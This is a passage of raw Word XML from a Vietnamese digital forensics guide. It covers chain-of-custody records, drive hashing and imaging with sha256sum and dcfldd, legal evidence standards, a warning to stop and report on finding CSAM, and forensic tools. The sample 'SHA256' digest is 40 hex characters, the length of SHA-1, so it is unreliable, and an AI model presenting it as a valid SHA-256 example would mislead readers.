        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F8D7C9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Ngày giờ, người giao, người nhận và lý do chuyển giao.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E57330F">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D5F5BF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Nhật ký lưu trữ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E33FC2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Nơi lưu an toàn và lịch sử ai đã truy cập, vào thời điểm nào.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="218C49FD">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1515DCC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Hồ sơ phân tích</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="114FB62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Tên chuyên viên, công cụ, phiên bản và ngày phân tích để bảo đảm khả năng tái lập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4537A7A0">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0EBE4E1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Hồ sơ xử lý cuối cùng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F9D9C3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Trả lại, tiêu hủy hoặc lưu trữ lâu dài kèm ngày và thẩm quyền phê duyệt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F6B63C4">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="Xbb5e00cbf8c628cf1da16b36dcdf529d378f79b"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ví dụ ghi nhận hash và tạo ảnh pháp chứng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A7707">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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sha256sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/sdb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/hash_original.txt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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dcfldd if=/dev/sdb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of=/home/the_cyber_bite/cases/CASE001/image.dd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hash=sha256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hashlog=/home/the_cyber_bite/cases/CASE001/hash_log.txt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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sha256sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/image.dd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># HASHES MATCH - Image integrity confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D206F56">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Case: CASE-2026-001 | Examiner: the_cyber_bite</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Evidence: Samsung SSD 860 EVO 64GB | Serial: S4EXNJ0N123456</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Collection date: 2026-01-15 09:23:44 UTC</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Collection location: 15 High Street, London - Exhibit A</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SHA256 (original): a94f321b2c5e11d44f12c8ee4d7d4c1b8e9f23ab</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SHA256 (image):    a94f321b2c5e11d44f12c8ee4d7d4c1b8e9f23ab</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkEnd w:id="11"/>
    <w:p w14:paraId="59D6D01B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="các-tiêu-chuẩn-chứng-cứ-quan-trọng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.3. Các tiêu chuẩn chứng cứ quan trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625FFAF">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Tính xác thực:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chứng cứ phải đúng là thứ được tuyên bố; thường chứng minh bằng hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB8EA2D">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Độ tin cậy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phương pháp thu thập và phân tích phải có cơ sở khoa học.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E0B98">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Quy tắc chứng cứ tốt nhất:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bản gốc hoặc bản sao pháp chứng chính xác, đã xác minh hash, có thể tương đương pháp lý với ổ đĩa gốc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64486268">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Ngoại lệ đối với lời khai truyền miệng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bản ghi do máy tính tạo có thể được xem là hồ sơ hoạt động kinh doanh, tùy luật áp dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3319E922">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Tiêu chuẩn Daubert:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nhân chứng chuyên gia phải sử dụng phương pháp khoa học đã được phản biện và chấp nhận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A9240">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Civil Evidence Act:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tài liệu do máy tính tạo có thể được suy đoán là chính xác cho đến khi có tranh chấp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E98E5D">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Tính tương xứng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chi phí và mức xâm phạm quyền riêng tư phải tương xứng với vấn đề điều tra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D22C013">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Cảnh báo bắt buộc:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nếu phát hiện tài liệu lạm dụng tình dục trẻ em (CSAM), hãy dừng ngay, liên hệ cơ quan thực thi pháp luật có thẩm quyền, không tiếp tục xem, sao chép hay phân tích. Ghi lại lý do dừng và những gì đã phát hiện theo quy định. Việc xem hoặc lưu giữ CSAM có thể cấu thành tội phạm ngay cả khi người thực hiện tự cho rằng đang điều tra.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:bookmarkEnd w:id="12"/>
    <w:p w14:paraId="07A02EF5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="Xabd49f07ad09840f222d93ec4dc6d5fd035a66c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3. Công cụ pháp chứng và môi trường phòng lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356AAE86">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Một máy trạm DFIR chuyên nghiệp cần phần cứng, phần mềm, môi trường kiểm soát và quy trình chống lây nhiễm chéo giữa các vụ việc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D13AE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="phần-cứng-thiết-yếu"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1. Phần cứng thiết yếu</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2654"/>
        <w:gridCol w:w="7392"/>
      </w:tblGrid>
      <w:tr w14:paraId="4123A466">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228278D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Thiết bị</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28FD29F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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2AEBD86B">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1709F11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Write Blocker phần cứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55D784A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Ngăn mọi thao tác ghi lên ổ chứng cứ trong khi tạo ảnh; bắt buộc với quy trình có thể bảo vệ trước tòa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FC564AE">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29F0C8A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Túi/lồng Faraday</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C3801F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Chặn tín hiệu không dây của thiết bị di động, tránh xóa dữ liệu từ xa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0CED0D3B">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7420C98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Forensic Duplicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A9EFFA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Thiết bị tạo ảnh độc lập như Tableau TX1 hoặc Logicube Falcon, không cần máy tính chủ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F70BC26">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478F00E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USB Write Blocker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="436F35F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Ngăn ghi lên thiết bị USB, ví dụ Tableau T8-R2 hoặc WiebeTech UltraDock.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51CF7662">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208041F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Bộ chuyển đổi SATA/NVMe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0901267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Kết nối nhiều loại ổ đĩa với máy trạm pháp chứng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10BBFDD9">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2B78E87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Đầu đọc SIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AD738E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Trích xuất dữ liệu SIM độc lập với điện thoại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C3789AC">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0BE3229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Công cụ JTAG/Chip-off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B2AA8A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Trích xuất mức thấp từ thiết bị khóa hoặc hư hỏng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C98E24A">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6931F0B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Phòng che chắn RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51C7E50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Môi trường Faraday toàn phần để kiểm tra thiết bị vẫn hoạt động mạng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="14"/>
    </w:tbl>
    <w:p w14:paraId="38EA1A28">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="nền-tảng-phần-mềm"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2. Nền tảng phần mềm</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2307"/>
        <w:gridCol w:w="7739"/>
      </w:tblGrid>
      <w:tr w14:paraId="021E7863">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76B29D5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Công cụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D45D58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Đặc điểm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D5D6FE3">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7332D03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Autopsy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11555B1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GUI mã nguồn mở: ảnh ổ đĩa, trích xuất dấu vết, tìm từ khóa và dựng dòng thời gian.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3A8C94A3">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0DA08D7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FTK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="116ECBE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Thương mại, đã được sử dụng trong tố tụng; hỗ trợ e-discovery, lập chỉ mục đầy đủ và tích hợp Cellebrite UFED.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="44926810">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489E374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X-Ways Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5879D67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Gọn, nhanh, mạnh; có trình chỉnh sửa hex tốt, được nhiều chuyên viên kinh nghiệm ưa dùng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="456B81E2">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3E65121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EnCase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B83012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Nền tảng doanh nghiệp, được chấp nhận rộng rãi trước tòa và tích hợp ứng phó sự cố.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2F2C66B1">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580E44E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Magnet AXIOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FA69EE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Phân tích endpoint, di động và đám mây trong một nền tảng, khả năng phân tích artefact mạnh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A658D77">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774E643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SIFT Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12DC81D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Máy ảo Ubuntu miễn phí của SANS, chứa bộ công cụ CLI pháp chứng toàn diện.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="551CD74B">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1B024B0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Kali Linux forensic mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
